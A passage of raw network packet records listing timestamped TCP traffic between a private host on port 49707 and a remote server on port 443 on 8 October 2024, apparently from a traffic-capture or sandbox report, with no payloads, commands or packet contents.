Oct 8, 2024 20:52:16.999290943 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.059061050 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.059087992 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.059156895 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.059178114 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.059218884 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.078767061 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.078800917 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.078877926 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.078900099 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.078932047 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.078942060 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.079653978 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.079670906 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.079725981 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.079736948 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.079775095 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.079881907 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.079896927 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.079945087 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.079952955 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.079988003 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.080127954 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.080143929 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.080200911 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.080209970 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.080250025 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.080405951 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.080421925 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.080476046 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.080482960 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.080526114 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.083395004 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.083431005 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.083471060 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.083483934 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.083513975 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.083534956 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.086189985 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.086204052 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.086267948 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.086283922 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.086327076 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.146246910 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.146269083 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.146346092 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.146364927 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.146405935 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.166302919 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.166325092 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.166407108 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.166429043 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.166460037 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.166682005 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.166697979 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.166755915 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.166765928 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.166802883 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.167292118 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.167308092 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.167367935 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.167377949 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.167414904 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.167829990 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.167844057 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.167900085 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.167910099 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.167932987 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.167947054 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.168329000 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.168344021 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.168397903 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.168405056 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.168441057 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.168462038 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.170542002 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.170558929 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.170620918 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.170629025 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.170663118 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.170680046 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.173161030 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.173190117 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.173268080 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.173275948 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.173316956 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.233247042 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.233268023 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.233339071 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.233361006 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.233417034 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.253427029 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.253449917 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.253514051 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.253531933 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.253556013 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.253575087 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.254470110 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.254486084 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.254560947 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.254569054 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.254610062 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.254977942 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.254992962 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.255059958 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.255068064 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.255116940 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.255422115 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.255462885 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.255500078 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.255508900 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.255537033 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.255552053 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.255835056 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.255851030 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.255903006 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.255914927 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.255955935 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.257797003 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.257822037 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.257915974 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.257915974 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.257925034 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.257972956 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.260124922 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.260134935 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.260200977 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.260211945 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.260229111 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.260248899 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.320363045 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.320385933 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.320457935 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.320488930 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.320564032 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.340282917 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.340313911 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.340378046 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.340388060 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.340424061 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.340444088 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.341398954 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.341424942 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.341459990 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.341471910 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.341506958 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.341515064 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.341918945 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.341933012 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.341984034 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.341990948 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.342014074 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.342031956 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.342375040 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.342391968 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.342464924 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.342472076 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.342515945 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.342715979 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.342742920 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.342783928 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.342792034 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.342817068 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.342829943 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.344583988 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.344614029 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.344650984 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.344672918 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.344686031 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.344718933 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.347615957 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.347652912 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.347690105 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.347702026 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.347728014 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.347752094 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.407330036 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.407351971 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.407414913 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.407432079 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.407444000 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.407525063 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.436786890 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.436805964 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.436881065 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.436892986 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.436937094 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.437321901 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.437336922 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.437407017 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.437414885 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.437644005 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.437700987 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.437716007 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.437779903 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.437787056 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.437859058 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.438020945 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.438050032 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.438091040 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.438101053 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.438118935 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.438170910 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.438523054 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.438539028 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.438597918 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.438604116 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.438661098 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.438874960 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.438889980 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.438942909 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.438951015 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.438977003 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.438996077 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.439241886 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.439258099 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.439296007 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.439301968 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.439328909 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.439342022 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.494251013 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.494271040 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.494321108 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.494340897 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.494349957 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.494391918 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.523819923 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.523840904 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.523900986 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.523912907 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.523922920 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.523977995 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.524195910 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.524213076 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.524266005 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.524271965 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.524363995 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.524610043 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.524626970 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.524682045 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.524688005 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.524830103 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.525093079 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.525108099 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.525171995 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.525180101 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.525342941 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.525450945 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.525496006 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.525518894 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.525523901 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.525561094 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.525578976 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.525787115 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.525806904 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.525847912 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.525854111 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.525880098 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.526182890 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.526204109 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.526253939 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.526259899 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.526273012 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.526310921 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.585637093 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.585659981 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.585733891 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.585772038 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.585783005 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.585848093 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.610543966 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.610591888 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.610635996 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.610670090 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.610678911 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.610678911 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.610718966 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.610735893 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.610743046 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.610771894 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.610800028 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.611028910 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.611047029 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.611112118 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.611119986 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.611161947 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.611371040 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.611403942 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.611440897 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.611448050 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.611474037 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.611524105 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.611624002 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.611641884 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.611712933 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.611718893 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.611764908 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.611913919 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.611929893 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.611989021 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.611994982 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.612060070 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.612184048 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.612198114 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.612241030 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.612246990 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.612277031 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.612291098 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.672414064 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.672440052 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.672509909 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.672524929 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.672563076 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.672590017 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.718508959 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.718528986 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.718589067 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.718619108 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.718652010 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.718661070 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.718744993 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.718755007 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.718760014 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.718786955 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.718796968 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.718802929 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.718812943 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.718817949 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.718862057 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.718894005 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:17.719043016 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.719065905 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:17.719120026 CEST	49707	443	192.168.2.8	188.114.97.3
